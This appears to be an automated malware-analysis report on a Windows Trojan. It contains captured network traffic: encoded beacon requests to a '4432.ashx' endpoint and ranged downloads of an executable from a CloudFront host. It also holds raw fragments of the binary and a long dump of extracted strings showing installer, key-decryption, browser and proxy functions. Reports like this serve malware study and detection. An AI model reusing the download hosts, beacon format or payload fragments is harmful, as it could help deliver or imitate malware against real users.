GET /4432.ashx?e=Lmrmx5d21cHK7BVW0pZkfpc0EuoUEWBpIM0CqmsRfbuUONmYGBhJBq3/AN/bF2roRdb/S8YKHkPcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTZIHVdl5GUgKkO9/DuORuprIIa1xct7IlIfNarWZRfuQ8SpJVUHpEeYCpHZc9ZUaETVDNBVYCm8jEzQGoF c24WnZlMkE cTWzrf1vX5AkfSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZaOxYJ8dWCEzVhG/x7b SWW5N9iJI sAWfK5w9Mw84Eg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERKtK2nLIJE3nHvKbjUyzCCcFAL52sIXt4WJJdSgnf3DEaNti66QtAKhfA9DmA/gYOYuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLciXFAHp4HlNvmf3gdPUqQs IILilpWF3zNK4whhQy Y93IDHD2utNjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUtA69U8mPn9S5U2Y/5LMdTN0F 4TVHAcQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:57 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=A3ANzFv7fWAr54jemLLd4Csj//MbtZml/KoWIkWiLQbCigHpURgZKwsmKxekNyxEfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyqmqLtMESIq9sOn8qqN1 RjsggvcrYSMiFOOgkw2kW7zK80craiCqNn959MVdvkix74r1XQZFERLjBH6ZzUnnXsmxw368usKjGzyp8r50/oAU8yRr4Ty3tIPlhjIQTrv xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqpqi7TBEiKvbDp/KqjdfkY7eULofKnZHg== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=1ZEnpGuz/IS8qFEAMB5m c6n6T6feu1MnvZi s3jtzGcl1mVNAzAtk9nl361I435LntfO9v5CwenNguChnjFYwi6MEIOzoe3sbJUX RIwaWTACqvES7cMRNUTv ezR4CQR6/4IivvmSmqX4 CyMVKUDaBP2Payz9333RAvM0VMAtaAQab8C2sQTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45HPJLBH7RQylAMoJ/zJRhYi3/v52Td23x HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va AW1ilHO0XlqaFGmNQisoEs IILilpWF2V9PoQYImhoi5ITADj fT8LkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOORzySwR 0UMpQDKCf8yUYWIt/7 dk3dt8Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=xY8ohDYpM j7QFMK1iR6ljGi57tKDBZAyMlYLXuYTiQeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcX4l9XCm/Va9X2V/SFN607WhPkLraqHTm0JQd5HxgIXcQOMljDWW9j2p99Xf0/DnudxygAlsjjAoDzAMf3myei3FoFumQGvNnWzsL6WMT/SwfVCvNBlCsGNZ8IeDOKR jnWMff4Q oj2Xr wogK3l0K88tZGn3ZbeZZ7z51F tJFmkm2U99zhC5SM3ph4m/ub2WPxooJBSEfKuXNkb9Ipz0vOSy6/9UD7v2dOTSCKQAEGFWYVf aIRoqDwneG9OT2WXrj6ZUfAb5hKtWJq6BTOwtTpX/QxZUjjb4jQoSuQY5U1UA3XDfdz2vKjb/PWSCkM43K3xVh7gIklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGWjsWCfHVghM1YRv8e2/klluTfYiSPrAFnyucPTMPOBI= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:58 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
....


GET /4432.ashx?e=hpY1rXLYst7XN7SCySESdzGi57tKDBZABBvtTcvyOOgeaFNcfNJ0Dj3LO2i4hwoZp2RYIisGWDtlUrzhzYzRp6OdFck5jWnwJppwgy8JkXL9Z9yZ1rBszlqgxz1SH5DJzbBYCuaAtAt7/GyX3Gr0UCYMJqhRDyHcntO0hfxvipXjJX2BNWr5ZmwkqgaQEwGAs IILilpWF3Xrw5h2f8ieI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1VLQOvVPJj5/UuVNmP SzHUzdBfuE1RwHE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 71e8lz54x-hvjtfa3f.netdna-ssl.com

HTTP/1.1 200 OK

Date: Mon, 06 Jul 2015 20:25:59 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS
HTTP/1.1 200 OK..Date: Mon, 06 Jul 2015 20:25:59 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /smw9476dp.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 0-249999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Yn5zB8OTl6xJbjEeRWyNOvDHyIVmc0vFswQw_sv_-zP7YjnO7-MCnA==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
..........=......................................s..........XB........
....<.(............................................................
p...............................text....[.......\.................. ..
`.rdata.......p.......`..............@[email protected].......
[email protected]...`[email protected].
..v..............@..@.................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected]@..e...E..E.P.u...
.r@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@
..u....E..9}[email protected].}.j.W.E......E.......@[email protected]
[email protected]<[email protected] [email protected]...\r
@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......
t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV.
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 500000-749999/3973864

X-Cache: Hit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: V5Z_P6BYgqvnfnFqlRXw3EPVTXfPJqNTvHK8KC_vRK3AemdS5nSjsg==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: no-cach
e..Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT..Accept-Ranges: bytes.
.ETag: "7057cf8b2271d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: A
SP.NET..Date: Thu, 02 Jul 2015 05:25:45 GMT..Content-Range: bytes 5000
00-749999/3973864..X-Cache: Hit from cloudfront..Via: 1.1 6640bb922817
c1f6799f0abbff6736d3.cloudfront.net (CloudFront)..X-Amz-Cf-Id: V5Z_P6B
YgqvnfnFqlRXw3EPVTXfPJqNTvHK8KC_vRK3AemdS5nSjsg==...8.h?./;...g/..t..`
......FM!......J.g..3.o.a...."z..{...]...&.......$...I6.G..\.9......o.
&". .'_zr4....Y...pe[p....Moc..4./M........z..U\j4......{|^.d.7.'....3
8...9.....$]o...../...Y]........,.X.<=.....5. G..1W..j...7...!x.$.~
...B.....W.4...\...B*.1.....{..?\.../P(9.........6..*...?=*.....64ILl.
x....!.._.aF!...*.6..s>.(...Zh.L.*..~NqP(..4!....V=.....A..:P./;...
[email protected].(...._::..Gp.....*.\Mzj...pD.'..`w...........#EJA.7{
............\.9..%W.0.n../Y.......f..g...'A..v.........!k....n..X...b.
...BB.......(7.......tz.....C..L.>....=..........$....9..=.Z....wP.
Z..|...3.2..@\k..$K.3.m.....T...i~...<...J.&!M{[email protected]!.0.......
....x2I"..........{.yk..9...D0..rR..a=...&0..).(.TaQm....j%..*$A......
...& T#....N^>.bn.>.....:U.[B......<S.e..3`j..3....y..fD.....
-Ok.........~........'....,).!..d_.L?S..!|`.....U.L.......;.q....:....
...;.......dy...o7.z{0].hG...^.5..,q....9... ."...g..Z..zP. .....TH...
...4.W....*...~H.r. ...6.{.F0u$.u....@r,.....R..L.....N..p{.c~m...
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=1750000-1999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 1750000-1999999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WczG-9vST9ntH1E_00s9rrblQi4ltvh-60cLu2L4A-vqkyyx6tFNpA==
.nj.m.P..V..%/...x..c.....h..x..$..8.^g..V...\.{..#2..?....#..^.FL.9..
[email protected]#O.....=5.9.(..i....T....Cv..-..u..i...CP..-..xk.T.
..m.,..V...........3.?T.....w....".....p A......3e..P.e....^.v.|.]D...
D...E.... {....pC.aO.^sz:U..}..!.,.Z,....4k..l ..>[email protected]..
5..-s.==..8p..;..4..!....Jr@3..]..........%.E.P.k#.e.....n ..E....1Xs6
......\S.,.....#g..n......Y.K.,4.y(...0...5............&.......<..n
*w..j.1a.>/...m.B..O.....ED.Pk..F.....z....#bC.>;...t^...a..9...
.&.......G...R................k..IW.C..iD...j.pp3...q.=....."'........
O.[....y....N.).....5..!..b..,.R..7'..2.A.[...F........E..c....u.*S)j.
.x ..T,...G.X...}Dd-?.Z..dm.e.......d4|.e-".}..1.r]{..L..&.. .D...%^..
......`...s.. ./-..QSl....VA....O 1.x..T......_......*.W.....3!...3...
JS..WZ.0..H..`9i........x.1M...x.c......]6......t].1.tRX.....Y.A.r.,..
.`iZ..|~.x...B....98...}......g...6.......'....x>H6.|...Ko.q...-...
..L.1q..=........d.L..53.x.>..;L..|B9.o....z..4...u0.l.g.<.w~.w.
..g..w.."......U.... .<[email protected]./..F.). M\...H...>.<|
!.d.AR... ......:.6.p.{v.-...9.......FI.fV....^d_`v..}....-.$.2..T.|b.
.7..Z.....A]@g..a.,.PDe7.............hu.......J.........*S...Q0m.d...&
gt;..o4g.>b.bo.K.-`....%.......>..z..O..}g....".rp.B>s..MAw.l
.......s.c.....<a.U...G....\..t.s.e"...|q..N.Z..cW".......=.....yL.
l..[..^...;Q...|(..l....8.4"......R...8=.>..B....B.~..b.Oq.@<9D.
...h`...WE"[email protected]..`.j....u.:R.y..... .....&.o....".Z `).L.k..
Y......c...R3h..Y./...\$.c}.<.....y.....0.r.E(..`hU*.[.}.q.[!..
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 2500000-2749999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _6J3jQ7MZrhoiZMcSr0-iPpB3io0rD3HbnXFBHEW5FewloZQVdtuXw==
.N...&'$....d.../..._d......S...N..... ..zd.~..(.H..~.|...;y.^.?.Y>
).0..]....L..7F.h.y.(...|r.r.-#a..P....J..\....4..s.....A...$?.g.....B
.;2.8.58.....F(n.%....*MLn.....d...9.v..zk.N.c.R..........N.}..l...].U
.0...*..C.n.'..e..:7..7......d..A...^..l.[E...$.E|....f.o .Tb....2..U(
............([email protected];... .O.......[....(}.-Q.....].LC.....L
n;....\..R...............J..j}V.-:....`T..=5.8.2.u...V.G.*.F.1*....h.h
}..$...T(.SC.......{<.]...WK...,.c.([email protected])S..
%......<...K.. E..VI........WG.1<.../....Am)...:...HP......kl...
<...r..Ll$o./....w..r.K.o.5.z.k..0C...N..N...Z.k]...7.)h..".}.o...A
....#.{/.........QR.Qb..n....d0..?./.. W.Z..^..hW...........J.0.t..M..
I.|...i...Xw3....l/).......a..K.......6..48T..O.....7.7..{,1{....b./..
...&Q.1Xu...._.?.\%..W....M..c...<...W..SX:.Gp...3.ED...q..=m..G$.A
.!M?.a..Za..Z....&...R..Dy.`Y>...b.pr`..[.....6.Uo..T..... ..,..a$S
..j.ZR\rZz.?......F.....'.....l..Q.w.....(.j...]w.]..5mAg..G..L.....p.
W1......1k..C.^..4..S..@`........M.[.......jG......0.~-....\|5|.C.R.m.
.s.......Y.\....R1....$k... [email protected].....:85........e.
...m.F....(..6..s..........n..B.....O.b;..........Q.....oc..?u#.j.....
.2b.U1..N....x...3.T@...<..v3..<.. .T.....]..*.....]..z.Jp.6...%
...?..X8.p...E.z.B.........Pd\.....K...B......AN.|r...z2......,....>
;.U..@]*..l..D.|._9?n..X...."t.x.T..<.....z.....]....qB.-#B..3....%
....]....../h...Z..k..........Z....b.5.$V*..i.`1...*..U.......n.~..Ilf
y\.?.......&..fU,.....-........c\. ..$ .X.'...ky..j3[k........,...
<<< skipped >>>

GET /smw9476dp.exe HTTP/1.1

Range: bytes=3500000-3749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: no-cache

Last-Modified: Tue, 07 Apr 2015 11:03:58 GMT

Accept-Ranges: bytes

ETag: "7057cf8b2271d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Thu, 02 Jul 2015 05:25:45 GMT

Content-Range: bytes 3500000-3749999/3973864

X-Cache: RefreshHit from cloudfront

Via: 1.1 6640bb922817c1f6799f0abbff6736d3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 2KNnXAuqtz3ihIbvq0p3mwQXgLwCCW9Gu4-6eBL8OVxREYyuA65ZAQ==
..a.....8%..............J...........*.......'...P.....C....l......p...
.|.4.c ..6.V....[9/|=..j.VNr....!.f^..............`....R.]....,2F~....
.w9.]61..|..,Wu...77.,.ft#..~......!&N.|..mv..z.-.Io..{=.0.....,Ky.I.F
.^h.......t..l..l.=,..n.X.-c.N...6?...5M.m...l.$l...h1.Q-.....3. cg.Vm
...3..i1....t..H..(....Y0..P...{..M..!KBaq.,n....09.J............0....
C.,....s...V.1.5.6...D...D........A`s.-.._Q^a.....C5.~.x..e^>d.$.,'
r...0#.-6q..<......h.HMR.4.4]...,..x...L...V.!6..T<..D.B..-._q!!
Ib.'..&C....K...[kl..C...*M*...h......../. -Y...g.UU..0..k:a....x.....
<.c..........Z...fO.G..O}..8]K..........b..(..C...\....b....."..a..
....fF...iI."..^/.KO..2.d..?} 9.Q..^L%..#..k.`p}Y_M./....j'..h........
......#..5Y.M..H-.Iu..^...#..I.*.i..2Xqx%.#..;.mZ..$.-*|.9L...f.`..;o.
..8..*.f./!i)T...O.Fj..NM....?ji..3gHp...([email protected].|........rG.(<d..
[email protected]|.2r....=vGXH.D..-v|..]r...?BYi......}..m....w....`K
I.'...p/...q....N1.c..D.N.o......v...&%l.Y.".d..EUk......E....}......I
19m&[".....~l.<.7..<.....m.........<.c..z".1........]p..tZ...
.....?.n.x....eI....;)......,u..2...'...y.dY`xf.U...%.O&.V.D..(...V#E1
2....D.^jA..$Dk.T.e.>hL1..'tb3M..c,D.H=...cTsY..U_j_b...4.q.}lIh.u.
.3 ..a;[8.!<.....M..R.;_.:.....lr...Q..=...G.e.;O.x=F...[; ...d....
d..=.t...../&.!..9\..A.=.../.A..R@_..Z"S.K. ..g....c..;!.Y.v.N..\.....
.......w.#S:..*t........T.E(.......(..Tv7..3|..b....g.|p!.....VY#.Nt.j
C;)[.. ....%.q.....~L.O..pG.I...$.... 4....".....{.....H1...p..,...Q!.
E..g..Q..4.8.$Y..rZQR.c.........d.L>., .....x.d...V.Pjk.U..H...
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\DC%original file name%.exe"

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\D1989.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp

.reloc

System.dll

callback%d

DcryptDll.dll

HexEncoder

ERROR: HexEncode: string length == 0!

ERROR: Key String too big!

ERROR: HexEncodeFile: Invalid file size!

ERROR: HexEncodeStr: Invalid string size!

ERROR: HexEnccodeStr: Invalid string size!

Key Length not EVEN!

Key Length too SMALL!

ERROR: Processing Key File, key too big!

ERROR: Reading Key File!

ERROR: GetFileSize of KeyFile Failed!

ERROR: Open Key_File Failed!

ERROR: wrong # parms, KEY expected!

ERROR: bad keysize, length MUST be even!

ERROR: invalid parm: HexEncoder function expected!

ERROR: wrong # parms: HexEncoder function expected!

6$6(6,6064686<6@6

:m.Xz

PFtP

DC%original file name%.exe

DC7EB4~1.EXE

%original file name%.exe

eb426a62ac6ba16b6415eb482bd2bdf.exe

\%original file name%.exe

c:\%original file name%.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b0</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>

2.8.9507.674

%original file name%.exe_588_rwx_10004000_00001000:

callback%d

DC%original file name%.exe_492:

.text

`.rdata

@.data

.rsrc

@.reloc

[email protected]

OtSSh

VQSSh

PSSSSSSh

t!SShT

PSSSSh

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

dbghelp.dll

%Y-%m-%dT%H:%M:%SZ

1.3.6.1.4.1.311.2.1.12

Cannot put the trigger ID: %x

{X-hX-hX-XX-XXXXXX}

Host Name: %s

Domain Name: %s

DHCP scope name: %s

GetNetworkParams failed with error: %d

WinHttpGetIEProxyConfigForCurrentUser failed with the following error number:

ERROR_WINHTTP_INTERNAL_ERROR

AutoConfigURL (MyProxyConfig.lpszAutoConfigUrl) is:

AutoConfigURL (MyProxyConfig.lpszProxy) is:

AutoConfigURL (is:

550e832f-a497-4eb7-bb40-8cc856f6d152

RegCreateKeyTransactedW

RegOpenKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

C:\BUILDS\Build_STUB\Installer\Release_YTDK\YTDKi.pdb

GetProcessHeap

KERNEL32.dll

EnumThreadWindows

EnumChildWindows

MsgWaitForMultipleObjectsEx

GetKeyboardLayoutList

USER32.dll

WS2_32.dll

GDI32.dll

RegOpenKeyExW

RegEnumKeyW

RegCloseKey

RegCreateKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegNotifyChangeKeyValue

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

OLEACC.dll

COMCTL32.dll

PSAPI.DLL

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

VERSION.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

SHFileOperationW

RPCRT4.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

GetCPInfo

zcÁ

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

.?AVCHttpFileDownload@@

.?AVCHttpAsync@@

.?AVCHttpDownload@@

.?AVCHttp@@

222222222

55555.ccc

22222222

22222222222

2222222222

222222222222

))aaaaaaaaaaaaa555555.7.??.cccccccAAAAAAAAAAAAA

2222222

..ccc

5.77..Lc7cEEcc7AAATE

|444|44|4

||||4|444

MM.LJ

MMM)MMBMBMBB???BBB??..?....L7.LLLEEEEEATAT

CMIC.CF?

@@,,@@,@@@@

**,,,,@,,@@,,

MMMMMBB???.BB?.7??.7.7LL7.7ELLELL7ETAETTTTT

@@,,@,,,,

MMBB???B?.......777.?.LLLLLLLETT

,,@,,,*,,,*

.hsdy>

,,,,*,,***

,,,@@,**,,,

MBMBBBBBB??????.B??.7c.77.LELL7LEEEL7E

,,****,*

MBMB??BBB???????...??777..LLEL7LAEEcAAATT

,**,,****

B???...7.7.777LLLL7ELAAAAAATAA

BB?.??.....?..LLLELEAAcEAEET

    #    #

B??BBMBB???BB....7777L7.LAATTELE

111111111

11111111111

BBMB?BB????...777.LLLL7LLAET

BB?.?.BBB???...LL7.77LLEEEEELTTTT

RRVVw%%X

#  #1111

BB??..77.7777.777EAEELELET

1111111

11111111

B??BB??..?..7..7L..LLLL

B??B?.B?......?..7.LL7LL

B??.?......LLL..

BB.....77.7LLL..LLEE

MBB??????.7.77.777L

MMBMMB..????....777.LEEE

??7.7.LLLL7LETL

8888888

BB.BB?........L77L

BMMB?B?....777.7.7.EEL

BBB.?B.77.......ETEE

BB.BB........7LLETTT

88888888

B???BB..BB?..7LLLT

BB.??BB..BB..7777L

B???????BB.?...LLLL7

BMB..BB.7.ELLLL77L

BBB??BB.?.LLLL77.

888888888

MBB?....B...cLLLLLLT

___&_&&&

__&&____&

____&___&&

____&__&_&

BM?.BBB?....777L

&&____&__&&__&&____

_&_&&_&&

.njm4tyyxwwwwxyytm3k.

\mbrkBinSub0\msmallFrac0\mdispDef1\mlMargin0\mrMargin0\mdefJc1\mwrapIndent1440\mintLim0\mnaryLim1}{\info{\author udif}{\operator Edith}{\creatim\yr2013\mo10\dy22\hr16\min58}{\revtim\yr2014\mo8\dy24\hr14\min26}{\version5}{\edmins16}{\nofpages4}

